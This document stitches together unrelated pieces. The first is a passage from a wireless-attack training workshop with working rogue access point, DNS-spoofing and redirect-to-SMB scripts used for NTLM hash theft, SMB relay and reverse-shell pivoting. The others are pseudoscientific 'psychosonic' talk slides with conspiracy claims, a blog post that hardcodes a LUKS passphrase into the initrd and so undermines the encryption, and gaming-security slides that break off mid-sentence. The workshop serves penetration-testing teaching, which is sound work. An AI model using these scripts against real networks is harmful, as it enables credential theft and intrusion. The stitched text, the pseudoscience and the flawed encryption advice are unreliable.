Advanced Wireless Attacks Against Enterprise Networks SMB Relays And LLMNR/NBT-NS Poisoning © 2017 Gabriel Ryan All Rights Reserved 34 Finally, you’ll see Metasploit deliver a payload to the Windows AD Victim machine, giving you a shell. Lab Exercise: SMB Relay Attacks Practice using impacket to perform SMB Relay attacks against your Windows AD Victim VM and your Windows DC VM. This time, perform the attack using the Empire Powershell framework by following the steps outlined at the following URL: ▪ https://github.com/s0lst1c3/awae/blob/master/lab6/instructions.txt You can find the Empire framework, as well as a copy of the instructions referenced above, within your home directory on the Kali VM. As your practice this attack, you may notice that it is ineffective against the domain controller. This is because domain controllers have a protection called SMB signing enabled by default that makes SMB Relay attacks impossible. Advanced Wireless Attacks Against Enterprise Networks Firewall And NAC Evasion Using Indirect Wireless Pivots © 2017 Gabriel Ryan All Rights Reserved 35 Firewall And NAC Evasion Using Indirect Wireless Pivots Chapter Overview In Wireless Man-In-The-Middle Attacks, we configured our Linux operating system to act as a wireless router. This allowed us to bridge traffic between our rogue access point and an upstream network interface, which enabled us to manipulate traffic. In this section, we’re going to learn a no-upstream attack that can be used to pivot from one segregated VLAN to another, bypassing firewall and NAC mechanisms in the process. Before we learn how to do this, however, we’ll need to learn how to configure Linux as a captive portal. Configuring Linux As A Captive Portal There are multiple ways to configure Linux to act as a captive portal. The most straightforward method of doing this is by running our own DNS server that resolves all queries to the IP address of our rogue access point. Recall that in Wireless Man-In-The-Middle Attacks, we created a DHCP configuration file with the following options. We can modify this configuration so that the IP of our external wireless interface is specified as the network’s primary DNS server using a DHCP Option, as shown below. We then start dnsspoof as our nameserver, configuring it to resolve all DNS queries to our access point’s IP. # define DHCP pool dhcp-range=10.0.0.80,10.0.0.254,6h # set Google as nameserver dhcp-option=6,8.8.8.8 # set rogue AP as Gateway dhcp-option=3,10.0.0.1 #Gateway dhcp-authoritative log-queries # define DHCP pool dhcp-range=10.0.0.80,10.0.0.254,6h # set phy as nameserver dhcp-option=6,10.0.0.1 # set rogue AP as Gateway dhcp-option=3,10.0.0.1 #Gateway dhcp-authoritative log-queries Advanced Wireless Attacks Against Enterprise Networks Firewall And NAC Evasion Using Indirect Wireless Pivots © 2017 Gabriel Ryan All Rights Reserved 36 This is a reasonably effective approach, as it allows us to respond to DNS queries in any way that we want. However, it still has a number of weaknesses. For one thing, wireless devices that connect to our rogue access point may choose to ignore the DHCP Option, selecting a nameserver manually instead. To prevent this from occurring, we can simply redirect any DNS traffic to our DNS server using iptables. Another problem with our current approach is that it does not account for the fact that most operating systems use a DNS cache to avoid having to make DNS lookups repeatedly. 
The domain names of the victim’s most frequently visited websites are likely to be in this cache. This means that our captive portal will fail in most situations until each of the entries in the cache expire. Additionally, our current approach will fail to capture HTTP requests that do not make use of DNS. To deal with these issues, we can simply redirect all HTTP traffic to our own HTTP server. We can incorporate these techniques into a bash script similar to the one we wrote in Wireless Man-In-The-Middle Attacks. Notice how we start Apache2 to serve content from /var/www/html. root@localhost~# echo ’10.0.0.1’ > dnsspoof.conf root@localhost~# dnsspoof –i wlan0 -f ./dnsspoof.conf root@localhost~# iptables --table nat --append PREROUTING --protocol udp - -destination-port 53 --jump REDIRECT --to-port 53 root@localhost~# iptables --table nat --append PREROUTING --protocol tcp - -destination-port 80 --jump REDIRECT --to-port 80 root@localhost~# iptables --table nat --append PREROUTING --protocol tcp - -destination-port 443 --jump REDIRECT --to-port 443 Advanced Wireless Attacks Against Enterprise Networks Firewall And NAC Evasion Using Indirect Wireless Pivots © 2017 Gabriel Ryan All Rights Reserved 37 phy=wlan0 channel=1 bssid=00:11:22:33:44:00 essid=FREE_WIFI # kill interfering processes service network-manager stop nmcli radio wifi off rfkill unblock wlan ifconfig wlan0 up echo “interface=$phy” > hostapd.conf “driver=nl80211” >> hostapd.conf “ssid=$essid” >> hostapd.conf bssid=$bssid” >> hostapd.conf “channel=$channel” >> hostapd.conf “hw_mode=g” >> hostapd.conf hostapd ./hostapd ifconfig $phy 10.0.0.1 netmask 255.255.255.0 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 echo "# define DHCP pool" > dnsmasq.conf echo "dhcp-range=10.0.0.80,10.0.0.254,6h" >> dnsmasq.conf echo "" >> dnsmasq.conf echo "# set phy as nameserver" >> dnsmasq.conf echo "dhcp-option=6,10.0.0.1" >> dnsmasq.conf echo "" >> dnsmasq.conf echo "# set rogue AP as Gateway" >> dnsmasq.conf echo "dhcp-option=3,10.0.0.1 #Gateway" >> dnsmasq.conf echo "" >> dnsmasq.conf echo "dhcp-authoritative" >> dnsmasq.conf echo "log-queries" >> dnsmasq.conf dnsmasq -C ./dnsmasq.conf & echo ’10.0.0.1’ > dnsspoof.conf dnsspoof –i $phy -f ./dnsspoof.conf systemctl start apache2 echo ‘1’ > /proc/sys/net/ipv4/ip_forward iptables --policy INPUT ACCEPT iptables --policy FORWARD ACCEPT iptables --policy OUTPUT ACCEPT iptables --flush iptables --table nat --flush iptables --table nat --append POSTROUTING -o $upstream --jump MASQUERADE iptables --append FORWARD -i $phy -o $upstream --jump ACCEPT iptables --table nat --append PREROUTING --protocol udp --destination-port 53 --jump REDIRECT --to-port 53 iptables --table nat --append PREROUTING --protocol tcp --destination-port 80 --jump REDIRECT --to-port 80 iptables --table nat --append PREROUTING --protocol tcp --destination-port 443 --jump REDIRECT --to-port 443 read -p ‘Press enter to quit…’ # kill daemon processes for i in `pgrep dnsmasq`; do kill $i; done for i in `pgrep hostapd`; do kill $i; done for i in `pgrep dnsspoof`; do kill $i; done for i in `pgrep apache2`; do kill $i; done # restore iptables iptables --flush iptables --table nat –flush Advanced Wireless Attacks Against Enterprise Networks Firewall And NAC Evasion Using Indirect Wireless Pivots © 2017 Gabriel Ryan All Rights Reserved 38 Lab Exercise: Captive Portal Use your Kali VM to run the bash script that we wrote in this section to create a captive portal. 
Connect to the captive portal using your Windows AD Victim virtual machine. From your Kali VM, notice the terminal output from dnsspoof that shows DNS queries being resolved to 10.0.0.1. From your Windows AD Victim virtual machine, observe how all traffic is redirected to an html page served by your Kali VM. Additionally, follow the instructions found at the following URL to create a captive portal using EAPHammer: ▪ https://github.com/s0lst1c3/awae/blob/master/lab7/instructions.txt Wireless Theory: Hostile Portal Attacks Consider a scenario in which we have breached the perimeter of a wireless network that is used to provide access to sensitive internal resources. The sensitive resources are located on a restricted VLAN, which is not accessible from the sandboxed VLAN on which we are currently located. An authorized wireless device is currently connected to the wireless network as well, but is located on the restricted VLAN. We can combine several of the attacks learned in this workshop to pivot into the restricted VLAN through the authorized device, even though we are located on a separate VLAN. To do this, we first force an authorized device to connect to us using an Evil Twin attack. Advanced Wireless Attacks Against Enterprise Networks Firewall And NAC Evasion Using Indirect Wireless Pivots © 2017 Gabriel Ryan All Rights Reserved 39 Once the workstation is connected to our rogue access point, we can redirect all HTTP and DNS traffic to our wireless interface as we did with our captive portal. However, instead configuring our portal’s HTTP server to merely serve a static HTML page, we configure it to redirect all HTTP traffic to an SMB share located on a non-existent server. Advanced Wireless Attacks Against Enterprise Networks Firewall And NAC Evasion Using Indirect Wireless Pivots © 2017 Gabriel Ryan All Rights Reserved 40 The result is that our victims are forced to resolve the SMB server’s hostname using either NBT- NS or LLMNR. This allows us to perform an LLMNR/NBT-NS poisoning attack, causing the victim to send us a username and password hash. The hash can be cracked offline to obtain a set of Active Directory credentials, which can then be used to pivot back into the Victim. This is called a hostile portal attack. Although hostile portal attacks are a fast way to steal Active Directory credentials, they aren’t a perfect solution to pivoting out of our sandbox. The reason for this is that password cracking is a time consuming process, even with powerful hardware. A more efficient approach is to ensnare multiple authorized endpoints using an Evil Twin attack, as shown in the diagram below. Advanced Wireless Attacks Against Enterprise Networks Firewall And NAC Evasion Using Indirect Wireless Pivots © 2017 Gabriel Ryan All Rights Reserved 41 Next, we use a Redirect to SMB attack as before to force Victim B (in the diagram above) to initiate NTLM authentication with the attacker. However, instead of merely capturing the NTLM hashes as before, we instead perform an SMB Relay attack from Victim B to Victim A. This gives us remote code execution on Victim A. Advanced Wireless Attacks Against Enterprise Networks Firewall And NAC Evasion Using Indirect Wireless Pivots © 2017 Gabriel Ryan All Rights Reserved 42 We use the SMB Relay attack to place a timed payload on Victim A, then kill our access point to allow both victims to connect back to the target network. 
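(As an aside, the redirect-everything portal described above needs very little code. The sketch below is a minimal stand-in, not EAPHammer's implementation; the hostname fileserver01 is an arbitrary name chosen precisely because it does not resolve, which is what forces the LLMNR/NBT-NS fallback.)

# Minimal hostile-portal web component: answer every HTTP request with a 302
# to an SMB share on a host that does not exist. Requires privileges to bind port 80.
from http.server import BaseHTTPRequestHandler, HTTPServer

class RedirectToSMB(BaseHTTPRequestHandler):
    def _redirect(self):
        self.send_response(302)
        self.send_header("Location", "file://fileserver01/share")
        self.end_headers()

    do_GET = _redirect
    do_POST = _redirect

HTTPServer(("0.0.0.0", 80), RedirectToSMB).serve_forever()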
The timed payload could be a scheduled task that sends a reverse shell back to our machine, allowing us to pivot from one VLAN to the other. Since both victims are authorized endpoints, they are placed back on the restricted VLAN when they reassociate with the target network. Advanced Wireless Attacks Against Enterprise Networks Firewall And NAC Evasion Using Indirect Wireless Pivots © 2017 Gabriel Ryan All Rights Reserved 43 Once this happens, the attacker simply waits for the scheduled reverse shell from Victim A. Once the attacker receives the reverse shell, he or she pivots from the quarantine VLAN to the restricted VLAN. Advanced Wireless Attacks Against Enterprise Networks Firewall And NAC Evasion Using Indirect Wireless Pivots © 2017 Gabriel Ryan All Rights Reserved 44 Wireless Redirect To SMB With LLMNR And NBT-NS Poisoning The attacks described in the previous section offer us a number of advantages. For one thing, they make the traditional LLMNR/NBT-NS poisoning attack more effective. LLMNR/NBT-NS Poisoning is a somewhat passive attack, which can prove to be a limitation. The attacker must either wait for a broadcast LLMNR/NBT-NS request to appear on the network, or trick a user into clicking a URL beginning with the world “file://”. By chaining LLMNR/NBT-NS poisoning with both an Evil Twin attack and a Redirect to SMB attack, the attacker can get meaningful results faster by actively engaging a target. We already know how LLMNR/NBT-NS poisoning works, so let’s talk about Redirect to SMB instead. In a Redirect to SMB attack, the attacker first creates an HTTP server that responds to all requests with a 302 redirect to an SMB share located on the attacker’s server. The attacker then uses a man-in-the-middle attack to force all of the victim’s HTTP(S) traffic to the malicious HTTP Advanced Wireless Attacks Against Enterprise Networks Firewall And NAC Evasion Using Indirect Wireless Pivots © 2017 Gabriel Ryan All Rights Reserved 45 server. When the victim attempts to access any web content, the malicious HTTP server issues the 302 redirect. This causes the victim to attempt to authenticate with the attacker in order to authenticate with the SMB share [17]. In our variation of the attack, we redirect the victim to an SMB share on a nonexistent system. This causes the victim to perform a NetBIOS lookup for a system that doesn’t exist. Consequently, the victim broadcasts either an LLMNR or NBT-NS request, allowing the attacker to steal the victim’s NTLM hash. Lab Exercise: Wireless Redirect To SMB With LLMNR/NBT-NS Poisoning With the theory out of the way, let’s pivot into a wireless client using the full Wireless Redirect to SMB With LLMNR/NBT-NS Poisoning attack. The eaphammer tool we used in Evil Twin Attack Using Hostapd-WPE can also be used for this purpose. Before we begin, create an open network using your wireless router. Then connect your Windows AD Victim virtual machine to the open network you just created. Next, use eaphammer to launch the attack from your Kali virtual machine. This will force the victim to connect to our access point, allowing us to pivot into the victim using an SMB Relay attack. root@localhost~# python eaphammer.py --interface wlan0 --essid FREE_WIFI - c 1 --auth peap --wpa 2 --hostile-portal Advanced Wireless Attacks Against Enterprise Networks Conclusion © 2017 Gabriel Ryan All Rights Reserved 46 Conclusion You should now have solid understanding of how to perform effective man-in-the-middle attacks without disrupting network resources. 
We also learned how to identify in-scope EAP networks and breach them using evil twin attacks. We even learned some network attacks that can be used against Active Directory environments, and demonstrated how to use wireless as a means of pivoting between segregated VLANs to bypass firewalls and NAC systems. The material covered in this course code is just the beginning. For additional reading, I highly recommend checking out the resources included in the resource section below. I also recommend reading about Karma attacks and the work of researchers such as Dino Dai Zovi and Dominic White. Finally, spend some time thinking about how these attacks could be used against your organization’s network, and what you could do to stop them. Advanced Wireless Attacks Against Enterprise Networks Resources © 2017 Gabriel Ryan All Rights Reserved 47 Resources [1] "Airbase-ng [Aircrack-ng]," in aircrack-ng.org, 2010. [Online]. Available: https://www.aircrack-ng.org/doku.php?id=airbase-ng. Accessed: Feb. 24, 2017. [2] P. Funk, S. Blake-Wilson, and rfcmarkup version 1, "Extensible authentication protocol tunneled transport layer security Authenticated protocol version 0 (EAP-TTLSv0)," 2008. [Online]. Available: https://tools.ietf.org/html/rfc5281. Accessed: Feb. 24, 2017. [3] J. R. Vollbrecht, B. Aboba, L. J. Blunk, H. Levkowetz, J. Carlson, and rfcmarkup version 1, "Extensible authentication protocol (EAP)," 2004. [Online]. Available: https://tools.ietf.org/html/rfc3748. Accessed: Feb. 24, 2017. [4] J. Wright and J. Cache, "Hacking exposed wireless," McGraw-Hill Education Group, 2015. [Online]. Available: http://dl.acm.org/citation.cfm?id=2825917. Accessed: Feb. 24, 2017. [5] J. Wright and B. Antoniewicz, "PEAP: Pwnd Extensible Authentication Protocol," in ShmooCon, 2008. [6] M. Marlinspike, "Moxie Marlinspike >> software >> sslstrip," in thoughtcrime.org, 2012. [Online]. Available: https://moxie.org/software/sslstrip/. Accessed: Feb. 24, 2017. [7] Red Hat, Inc, "Chapter 17. iptables," in Red Hat Enterprise Linux 3: Reference Guide, 2003. [Online]. Available: https://access.redhat.com/documentation/en- US/Red_Hat_Enterprise_Linux/3/html/Reference_Guide/ch-iptables.html. Accessed: Feb. 24, 2017. [8] "iptables(8) - Linux man page," in linux.die.net. [Online]. Available: https://linux.die.net/man/8/iptables. Accessed: Feb. 24, 2017. [9] Mozilla Developer Network, "Strict-transport-security," in developer.mozilla.org, Mozilla Developer Network, 2016. [Online]. Available: https://developer.mozilla.org/en- US/docs/Web/HTTP/Headers/Strict-Transport-Security. Accessed: Feb. 24, 2017. [10] D. Keeler, "Preloading HSTS," Mozilla Security Blog, 2012. [Online]. Available: https://blog.mozilla.org/security/2012/11/01/preloading-hsts/. Accessed: Feb. 24, 2017. [11] L. Nve Egea, "OFFENSIVE: Exploiting changes on DNS server configuration," in Blackhat Asia, 2014. [Online]. Available: https://www.blackhat.com/docs/asia-14/materials/Nve/Asia-14- Nve-Offensive-Exploiting-DNS-Servers-Changes.pdf. Accessed: Feb. 24, 2017. Advanced Wireless Attacks Against Enterprise Networks Resources © 2017 Gabriel Ryan All Rights Reserved 48 [12] Protocol standard for a NetBIOS service on a TCP/UDP transport: Concepts and methods. NetBIOS Working Group in the Defense Advanced Research Projects Agency, Internet Activities Board, End-to-End Services Task Force. March 1987. 
(Format: TXT=158437 bytes) (Also STD0019) (Status: INTERNET STANDARD) (DOI: 10.17487/RFC1001) [13] Protocol standard for a NetBIOS service on a TCP/UDP transport: Detailed specifications. NetBIOS Working Group in the Defense Advanced Research Projects Agency, Internet Activities Board, End-to-End Services Task Force. March 1987. (Format: TXT=170262 bytes) (Also STD0019) (Status: INTERNET STANDARD) (DOI:10.17487/RFC1002) [14] L. Gaffié, "Laurent Gaffié," Trustwave, 2017. [Online]. Available: https://www.trustwave.com/Resources/SpiderLabs-Blog/Responder-2-0---Owning-Windows- Networks-part-3/. Accessed: Feb. 24, 2017. [15] Microsoft, "Microsoft NTLM," 2017. [Online]. Available: https://msdn.microsoft.com/en- us/library/windows/desktop/aa378749(v=vs.85).aspx. Accessed: Feb. 24, 2017. [16] J. Barreto, "The basics of SMB signing (covering both SMB1 and SMB2)," Jose Barreto’s Blog, 2010. [Online]. Available: https://blogs.technet.microsoft.com/josebda/2010/12/01/the- basics-of-smb-signing-covering-both-smb1-and-smb2/. Accessed: Feb. 24, 2017. [17] "SPEAR: Redirect to SMB," 2015. [Online]. Available: https://www.cylance.com/redirect-to- smb. Accessed: Feb. 24, 2017. [18] "Eduroam US - global Wi-Fi roaming for academia,". [Online]. Available: https://www.eduroam.us/node/10. Accessed: Feb. 24, 2017. [19] M. Jahoda et al., "Red Hat Enterprise Linux 6.9 Beta Security Guide," 2016. [Online]. Available: https://access.redhat.com/documentation/en- US/Red_Hat_Enterprise_Linux/6/html-single/Security_Guide/index.html#sect-Security_Guide- Firewalls-FORWARD_and_NAT_Rules. Accessed: Feb. 24, 2017. [20] Microsoft, "Message Flow for Basic NTLM Authentication," in MSDN. [Online]. Available: https://msdn.microsoft.com/en-us/library/cc239684.aspx. Accessed: Feb. 24, 2017. [21] "SMB relay: How we leverage it and how you can stop us," TAGI.WIKI, 2015. [Online]. Available: http://www.tagi.wiki/advisories/smb-relay-how-we-leverage-it-and-how-you-can- stop-us. Accessed: Feb. 24, 2017. [22] S. Chaudhary, "Evil twin Tutorial," Kali Linux Hacking Tutorials, 2014. [Online]. Available: http://www.kalitutorials.net/2014/07/evil-twin-tutorial.html. Accessed: Feb. 24, 2017.
Weaponizing Lady GaGa PsychoSonic Attacks Brad (theNURSE) Smith Private Practice Informatics Nurse What the heck is PsychoSonics? • Sounds that effect the Brain • “Harmonize” with brain • Not NLP, Yes SE Heinrich Wilhelm Dove • Binary beats founder • One for the first Climatologist • Binaural, Monaural, and Isochronic Physiology of PS Music 'nurtures' premature Babies • A Canadian team found music reduced pain and encouraged better oral feeding. http://news.bbc.co.uk/2/hi/health/8068749.stm Frequency Wave Produces 40Hz > Gamma Insight, Ah Ha moment 13 to 40 Hz Beta Active, busy or anxious thinking and active concentration 8 to 13 Hz Alpha Relaxation (while awake) 4 to 7 Hz Theta Dreams, deep meditation, hypnosis < 4 Hz Delta Deep dreamless sleep Military Uses Hx of PS Japanese Sonic Tuba Vietnam War C47 with Loudspeakers • • LRAD can put the “word of God” into their heads. If God, in the form of a voice that only you can hear, tells you to surrender, or run away, what are you gonna do? Ghosts • … the showing was 18.98 hertz--the exact frequency at which a human eyeball starts resonating. • www.physicsroom.com.nz The Urban Funk Campaign Wandering Soul recordings of eerie sounds said to represent the souls of the dead were played at night to spook the superstitious enemy. Problems • Gitmo: played Neil Diamond “Coming to America” • Binyam Mohamed forced to listen to Eminem and Dr Drs for 20 days Top 10 Sonic torture songs 1. White America – Eminem. 2. Barney theme song. 3. Enter Sandman – Mettalica. 4. Hells Bells – AC/DC. 5. Stayin Alive – Bee Gees. 6. Dirrty – Christina Aguilera. 7. America – Neil Diamond. 8. Bulls on Parade – Rage Against the Machine. 9. American Pie – Don McLean. 10. Bodies – Drowning pool Mosquito speaker • Either set the device to 17KHz to disperse groups of troublesome teenagers OR set it to 8 KHz to disperse people of any age Does Vegas do PS? • How many think Vegas uses psychosonics on the casino floor? • The sound of slot machines? Creating weapons of Mass GaGa Her Arsenal is Mighty Lady Gaga: Puppet of Illuminati Mind Control By MAX FISHER on March 16, 2010 LADY GAGA, MICHAEL JACKSON: PUPPETS OF THE ILLUMINATI! How to • Make psychosonic file •Frequency determines “mood” • Embed into MP3 • Best with headphones Frequency Wave Produces 40Hz > Gamma Insight, Ah Ha moment 13 to 40 Hz Beta Active, busy or anxious thinking and active concentration 8 to 13 Hz Alpha Relaxation (while awake) 4 to 7 Hz Theta Dreams, deep meditation, hypnosis < 4 Hz Delta Deep dreamless sleep Software • Gnaural • BrainStimPro Binaural Brainwave Generator • Audacity / Lame • Binaural Gnaural Audacity PreMade Examples Further Help • Gnaural / Binaural • www.psywarrior.com • www.selfdefenseproducts.com • www.unexplainable.net • http://pantheon.yale.edu/~bbl2/Gn auralExampleFiles.html Review • Tones effect your brain • Lower tones “sync” with moods • Longer is better • Samples on DVD Future Work • Do current songs use this? • Prove Vegas uses it! • Phone Vomit • Suggestions? Thanks!! • Let me know how this info works for You. • Always into sound. theNURSE@CyberInfoSec.com
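The "How to" slides above (pick a band from the table, generate the tone pair, embed it in an MP3) do not strictly require Gnaural. The sketch below is a minimal Python stand-in that writes a ten-second stereo WAV with a 10 Hz difference between the ears, which falls in the alpha range from the frequency table; the carrier frequency, amplitude and duration are illustrative choices, not values taken from the talk.

# Minimal binaural-beat generator: 200 Hz in the left ear, 210 Hz in the right,
# so the perceived beat is 10 Hz. Output: binaural.wav (16-bit stereo, 44.1 kHz).
import math
import struct
import wave

RATE, SECONDS = 44100, 10
BASE, BEAT = 200.0, 10.0

with wave.open("binaural.wav", "w") as out:
    out.setnchannels(2)
    out.setsampwidth(2)
    out.setframerate(RATE)
    frames = bytearray()
    for n in range(RATE * SECONDS):
        t = n / RATE
        left = int(32767 * 0.3 * math.sin(2 * math.pi * BASE * t))
        right = int(32767 * 0.3 * math.sin(2 * math.pi * (BASE + BEAT) * t))
        frames += struct.pack("<hh", left, right)
    out.writeframes(bytes(frames))

Mixing the result under a music track (as the talk suggests doing with Audacity) is just an amplitude mix; headphones are needed because each ear must receive a different tone.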
Linux Full Disk Encryption

Reading Chengzijiang's post on decrypting encrypted partitions reminded me that I set up Linux full disk encryption a while back, so here is the approach.

1. During installation, choose to encrypt the / (root) partition. Just three partitions: one swap, one boot, and one root partition (encrypted, passphrase of your choice). Install everything else as normal; CentOS 6.9 is used as the example here.

2. After entering the system, open the /usr/share/dracut/modules.d/90crypt/ directory (found by reading the documentation). Edit cryptroot-ask.sh: comment out lines 108-112 with "#", then add one line (as in the screenshot):
echo "password" | cryptsetup luksOpen -T1 "$device" "$luksname"
Here password is the passphrase the LUKS partition would normally prompt for. Without this change, the root partition's passphrase has to be typed by hand on every boot; with the modified script, the system enters your LUKS passphrase automatically at startup.
Save the change and run dracut --force to regenerate the initrd image.

At this point LUKS full disk encryption with automatic passphrase entry already works, but GRUB can still be edited at the console to skip straight past the root password. If the GRUB problem does not matter to you, full disk encryption with automatic passphrase entry ends here. Otherwise, add another obstacle.

Rename the /dev/mapper/ device to something of your own, for example dbaroot (any name you like), and update the corresponding grub.conf to match. The rhgb quiet at the end of grub.conf does not need to be removed.
Save the changes and run dracut --force to regenerate the initrd again (this is the second dracut; the first one was actually unnecessary).
You can also rename init and the kernel here, to something like an MD5 string.
At this point, reboot and check that the changes work.

The key is GRUB, so reinstall GRUB from a rebuilt RPM. The RPM build environment needs an identical grub.conf; I used grub-0.97-99.el6. All the other build steps are the same. The only difference is that I compiled the /boot/grub/grub.conf configuration file into the binary by patching the source and adding one extra parameter, --enable-preset-menu=/boot/grub/grub.conf:
./configure --enable-preset-menu=/boot/grub/grub.conf
(./configure --host=x86_64-redhat-linux-gnu --build=x86_64-redhat-linux-gnu --program-prefix= --prefix=/usr --exec-prefix=/usr --bindir=/usr/bin --sbindir=/usr/sbin --sysconfdir=/etc --datadir=/usr/share --includedir=/usr/include --libdir=/usr/lib64 --libexecdir=/usr/libexec --localstatedir=/var --sharedstatedir=/var/lib --mandir=/usr/share/man --infodir=/usr/share/info --sbindir=/sbin --disable-auto-linux-mem-opt --datarootdir=/usr/share --enable-preset-menu=/boot/grub/grub.conf)
The resulting file is /root/rpmbuild/RPMS/x86_64/grub-0.97-99.el6.x86_64.rpm
rpm -ivh ***.rpm
grub-install /dev/sda
Finally, delete /boot/grub/grub.conf.
Reboot the system. Everything works. Guard your root password.
Backdooring the Lottery and Other Security Tales from Gaming July 30, 2017 Gus Fritschie and Evan Teitelman Presentation Overview 1. Introductions 2. What has happened since 2011 3. Historical overview of security incidents in gaming 4. Eddie Tipton and the lottery 5. Russian slot attacks 6. Conclusion © SeNet International Corp. 2017 3 July 2017 SeNet Who We Are – SeNet International © SeNet International Corp. 2017 4 July 2017 SeNet Who We Are – Gus Fritschie Gus Fritschie has been involved in information security since 2000. About 5 years ago (after his previous DEF CON presentation on iGaming security) he transitioned a significant portion of his practice into the gaming sector. Since then he has established himself and SeNet as the IT security leader in gaming. He has supported a number of clients across the gaming spectrum from iGaming operators, land-based casinos, gaming manufacturer, lotteries, tribal gaming, and daily fantasy sports. @gfritschie © SeNet International Corp. 2017 5 July 2017 SeNet Who We Are – Evan Teitelman Evan works and lives in the Washington DC area. He is the founder and lead developer of BlackArch Linux and specializes in reverse engineering and secure application development. In his free time he enjoys hiking, climbing, and working on his van. © SeNet International Corp. 2017 6 July 2017 SeNet What this talk is and is not © SeNet International Corp. 2017 7 July 2017 SeNet What has happened since 2011 © SeNet International Corp. 2017 8 July 2017 SeNet iGaming Legislation © SeNet International Corp. 2017 9 July 2017 SeNet Highlighted Security Incidents in Gaming Since 2011 None of these will be discussed in detail but are listed to illustrate that this sector is not immune to these threats. Only a small sampling. • Las Vegas Sands hack • NJ iGaming DDOS attacks • Affinity Gaming breach • Hard Rock Hotel & Casino data breach • Casino Rama Resort in Ontario • Peppermill Resort Spa Casino in Reno credit card breach • Weaknesses in Daily Fantasy Sports (DFS) protections © SeNet International Corp. 2017 10 July 2017 SeNet Las Vegas Sands © SeNet International Corp. 2017 11 July 2017 SeNet History Class © SeNet International Corp. 2017 12 July 2017 SeNet Early attacks against slot machines © SeNet International Corp. 2017 13 July 2017 SeNet Early attacks against slot machines (Cont.) Shaved, fake coins and yo-yoing Banknote validators © SeNet International Corp. 2017 14 July 2017 SeNet Early attacks against slot machines (Cont.) Tommy Carmichael Monkey Paw, a taut string attached to a bent metal rod. This rod was jammed into the machine via the air vent and was used to fish around for the switch that released the coin hopper. Once the switch was activated, money was released! This contraption took advantage of the fact that new machines used optical sensors to detect the number of coins dispensed. By blinding the optical sensor, the Light Wand made it impossible for the machine to know how much money it was releasing. Therefore, a player equipped with a Light Wand only had to play until a small jackpot was hit; it was then a matter of inserting the wand and turning a small payout into a mountain of money. © SeNet International Corp. 2017 15 July 2017 SeNet 1980 Pennsylvania Lottery scandal April 24th 1980 the lottery reaches its liability limits on the Daily Number (3-digit game) on 8 of the possible combinations of 6s and 4s (444, 446, 464, 644, 646, 664, 666) Winning number was 666. Later in the evening rumors surfacing that illegal bookmakers were not paying. 
When watched in slow motion only the 4s and 6s ever move more than a few inches from the bottom, as the rest of the balls had been weighted. © SeNet International Corp. 2017 16 July 2017 SeNet Ron Harris attacks against slots and keno Ronald Dale Harris is a computer programmer who worked for the Nevada Gaming Control Board in the early 1990s and was responsible for finding flaws and gaffes in software that runs computerized casino games. Harris took advantage of his expertise, reputation and access to source code to illegally modify certain slot machines to pay out large sums of money when a specific sequence and number of coins were inserted © SeNet International Corp. 2017 17 July 2017 SeNet Ron Harris attacks against slots and keno (Cont.) Harris surreptitiously coded a hidden software switch -- tripped by inserting coins in a predetermined sequence -- that would trigger cash jackpots. After retooling more than 30 machines, Harris and accomplices made the rounds, walking away with hundreds of thousands of dollars. © SeNet International Corp. 2017 18 July 2017 SeNet Ron Harris attacks against slots and keno (Cont.) Harris shifted his focus to the probability game Keno, for which he developed a program that would determine which numbers the game's pseudorandom number generator would select beforehand. When Harris' accomplice, Reid Errol McNeal, attempted to redeem a high value winning keno ticket at Bally's Atlantic City Casino Hotel in Atlantic City, New Jersey, casino executives became suspicious of him and notified New Jersey gaming investigators. The investigation led authorities to Harris and after a trial was sentenced to seven years in prison. He was released from prison after serving two years and currently resides in Las Vegas. © SeNet International Corp. 2017 19 July 2017 SeNet Previous iGaming hacks/scandals © SeNet International Corp. 2017 20 July 2017 SeNet Current Events © SeNet International Corp. 2017 21 July 2017 SeNet Eddie Tipton Hot Lotto RNG Rigging Rob Sand – Iowa Assistant Attorney General (lead prosecutor) Eddie Tipton Tommy Tipton Robert Rhodes © SeNet International Corp. 2017 22 July 2017 SeNet Tipton Overview Lottery Fraud Case Involving a $14.3 million prize! Lottery ticket purchased at a QuikTrip near Interstate Highway 80 on Dec. 23, 2010. Prize went unclaimed for almost a year, until Hexham Investments Trust, a mysterious company incorporated in Belize, tried to claim the prize through Crawford Shaw, a New York attorney, hours before the ticket was set to expire in 2011. © SeNet International Corp. 2017 23 July 2017 SeNet Tipton Overview (Cont.) Lottery officials refused to release the prize because those behind the trust declined to give their identities, which is required under Iowa law. Claim to prize was withdrawn in January 2012. At that time, Iowa Lottery officials asked the Iowa Attorney General's Office and Iowa DCI to investigate. On Oct. 13, authorities received a tip from an out-of- state employee of the Multi-State Lottery Association that Tipton was the man in the video. Investigators analyzed Tipton's cellphone records, which indicated he was in Des Moines when the ticket was purchased, according to the arrest report. They also discovered Tipton rented a silver 2007 Ford Edge on Dec. 22, which matched the vehicle of the buyer of the winning lottery ticket © SeNet International Corp. 2017 24 July 2017 SeNet Tipton Overview (Cont.) Eddie was convicted in 2015 of two counts of fraud following a weeklong trial. 
One of the fraud charges accused Tipton of tampering with the nonprofit's computers to rig the draw, while the second accused him of participating in the ill-fated attempt to redeem the ticket in late 2011 that sparked an investigation. He was sentenced to 10 years in prison, but has been out on bond pending appeal. June 29, 2016 Tipton pleaded guilty to three felony charges in Iowa and Wisconsin. The other states where fraud occurred have agreed not to prosecute. © SeNet International Corp. 2017 25 July 2017 SeNet Tipton Timeline March 2003 – Eddie Tipton is hired at MUSL November 23, 2005 – Colorado Lottery fraud December 29, 2007 – Wisconsin Lottery fraud December 29, 2010 – Kansas Lottery fraud December 29, 2010 – Iowa Hot Lotto fraud November 23, 2011 – Oklahoma Lottery fraud January 15, 2015 – Eddie Tipton arrested March 2015 – Rhodes was arrested on 2 counts of fraud July 20, 2015 – Eddie Tipton Convicted September 9, 2015 – Sentenced to 10 years, but free on bond pending appeal October 2015 – New criminal charges filed related to 2005 and 2007 fraud March 30, 2016 – Tommy Tipton charged June 29th, 2017 – Eddie pleads guilty in Iowa © SeNet International Corp. 2017 26 July 2017 SeNet How to rig the lottery Steps to rig the lottery: 1. Become a lottery RNG developer 2. Write code to make the numbers predictable 3. Have your friends buy tickets with the winning numbers © SeNet International Corp. 2017 27 July 2017 SeNet How he Rigged the Lottery © SeNet International Corp. 2017 28 July 2017 SeNet How he Rigged the Lottery (really) • In 2003 Eddie got a job as an RNG developer at MUSL • While working there he wrote code which made the numbers predictable on three dates • The source code and RNG binaries were certified by one of the major testing labs © SeNet International Corp. 2017 29 July 2017 SeNet How he rigged the lottery (cont.) • In 2016 SeNet 